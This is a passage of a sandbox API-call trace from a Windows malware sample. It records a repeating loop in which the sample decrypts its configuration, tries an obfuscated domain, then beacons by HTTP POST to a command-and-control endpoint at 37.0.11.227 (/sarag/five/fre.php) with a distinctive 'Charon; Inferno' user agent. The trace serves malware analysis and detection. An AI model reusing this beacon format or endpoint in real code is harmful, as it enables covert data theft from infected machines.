0x690000 [0237.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0237.365] GetProcessHeap () returned 0x690000 [0237.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0237.366] GetProcessHeap () returned 0x690000 [0237.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0237.366] closesocket (s=0x618) returned 0 [0237.366] GetProcessHeap () returned 0x690000 [0237.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0237.366] GetProcessHeap () returned 0x690000 [0237.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0237.367] GetProcessHeap () returned 0x690000 [0237.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0237.367] GetProcessHeap () returned 0x690000 [0237.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0237.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x988) returned 0x618 [0237.369] Sleep (dwMilliseconds=0xea60) [0237.371] GetProcessHeap () returned 0x690000 [0237.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0237.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.372] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0237.390] GetProcessHeap () returned 0x690000 [0237.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0237.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.391] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0237.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.392] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.395] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.395] GetProcessHeap () returned 0x690000 [0237.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0237.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.405] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0237.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.426] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0237.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.427] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0237.427] GetProcessHeap () returned 0x690000 [0237.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.430] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.431] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.432] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.433] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.433] GetProcessHeap () returned 0x690000 [0237.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0237.434] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.434] GetProcessHeap () returned 0x690000 [0237.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0237.435] GetProcessHeap () returned 0x690000 [0237.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0237.436] GetProcessHeap () returned 0x690000 [0237.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0237.436] GetProcessHeap () returned 0x690000 [0237.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0237.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.479] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0237.489] GetProcessHeap () returned 0x690000 [0237.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0237.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.491] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0237.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.492] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.493] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.493] GetProcessHeap () returned 0x690000 [0237.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0237.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.496] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0237.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.497] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0237.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.498] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0237.498] GetProcessHeap () returned 0x690000 [0237.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.499] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0237.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.500] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0237.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.501] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0237.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.502] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0237.502] GetProcessHeap () returned 0x690000 [0237.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0237.502] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0237.502] GetProcessHeap () returned 0x690000 [0237.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0237.502] socket (af=2, type=1, protocol=6) returned 0x61c [0237.503] connect (s=0x61c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0237.530] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0237.531] GetProcessHeap () returned 0x690000 [0237.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0237.531] GetProcessHeap () returned 0x690000 [0237.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0237.531] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.532] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0237.532] GetProcessHeap () returned 0x690000 [0237.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0237.532] GetProcessHeap () returned 0x690000 [0237.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0237.533] GetProcessHeap () returned 0x690000 [0237.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0237.533] GetProcessHeap () returned 0x690000 [0237.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0237.534] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.534] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0237.534] GetProcessHeap () returned 0x690000 [0237.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0237.534] GetProcessHeap () returned 0x690000 [0237.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0237.535] send (s=0x61c, buf=0x6ad508*, len=242, flags=0) returned 242 [0237.535] send (s=0x61c, buf=0x6aba40*, len=159, flags=0) returned 159 [0237.535] GetProcessHeap () returned 0x690000 [0237.536] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0237.536] recv (in: s=0x61c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0237.614] GetProcessHeap () returned 0x690000 [0237.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0237.615] GetProcessHeap () returned 0x690000 [0237.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0237.615] GetProcessHeap () returned 0x690000 [0237.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0237.616] GetProcessHeap () returned 0x690000 [0237.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0237.618] closesocket (s=0x61c) returned 0 [0237.618] GetProcessHeap () returned 0x690000 [0237.618] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0237.618] GetProcessHeap () returned 0x690000 [0237.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0237.619] GetProcessHeap () returned 0x690000 [0237.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0237.619] GetProcessHeap () returned 0x690000 [0237.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0237.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x688) returned 0x61c [0237.621] Sleep (dwMilliseconds=0xea60) [0237.622] GetProcessHeap () returned 0x690000 [0237.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0237.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0237.637] GetProcessHeap () returned 0x690000 [0237.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0237.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.638] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0237.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.639] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.640] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.640] GetProcessHeap () returned 0x690000 [0237.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0237.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.651] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0237.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.662] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0237.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.663] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0237.663] GetProcessHeap () returned 0x690000 [0237.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.666] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.667] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.668] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.668] GetProcessHeap () returned 0x690000 [0237.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0237.668] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.669] GetProcessHeap () returned 0x690000 [0237.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0237.669] GetProcessHeap () returned 0x690000 [0237.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0237.669] GetProcessHeap () returned 0x690000 [0237.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0237.670] GetProcessHeap () returned 0x690000 [0237.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0237.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.671] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.680] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0237.690] GetProcessHeap () returned 0x690000 [0237.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0237.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.691] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0237.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.692] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.693] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.693] GetProcessHeap () returned 0x690000 [0237.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0237.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.695] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0237.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.697] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0237.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.698] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0237.698] GetProcessHeap () returned 0x690000 [0237.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.699] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0237.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.700] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0237.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.701] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0237.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.702] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0237.702] GetProcessHeap () returned 0x690000 [0237.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0237.702] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0237.702] GetProcessHeap () returned 0x690000 [0237.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0237.703] socket (af=2, type=1, protocol=6) returned 0x620 [0237.703] connect (s=0x620, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0237.735] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0237.735] GetProcessHeap () returned 0x690000 [0237.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0237.735] GetProcessHeap () returned 0x690000 [0237.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0237.736] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.737] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0237.737] GetProcessHeap () returned 0x690000 [0237.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0237.737] GetProcessHeap () returned 0x690000 [0237.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0237.738] GetProcessHeap () returned 0x690000 [0237.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0237.738] GetProcessHeap () returned 0x690000 [0237.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0237.739] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.740] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0237.740] GetProcessHeap () returned 0x690000 [0237.740] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0237.740] GetProcessHeap () returned 0x690000 [0237.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0237.740] send (s=0x620, buf=0x6ad508*, len=242, flags=0) returned 242 [0237.741] send (s=0x620, buf=0x6aba40*, len=159, flags=0) returned 159 [0237.741] GetProcessHeap () returned 0x690000 [0237.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0237.741] recv (in: s=0x620, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0237.814] GetProcessHeap () returned 0x690000 [0237.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0237.816] GetProcessHeap () returned 0x690000 [0237.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0237.817] GetProcessHeap () returned 0x690000 [0237.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0237.818] GetProcessHeap () returned 0x690000 [0237.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0237.818] closesocket (s=0x620) returned 0 [0237.819] GetProcessHeap () returned 0x690000 [0237.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0237.819] GetProcessHeap () returned 0x690000 [0237.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0237.820] GetProcessHeap () returned 0x690000 [0237.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0237.820] GetProcessHeap () returned 0x690000 [0237.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0237.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x114c) returned 0x620 [0237.823] Sleep 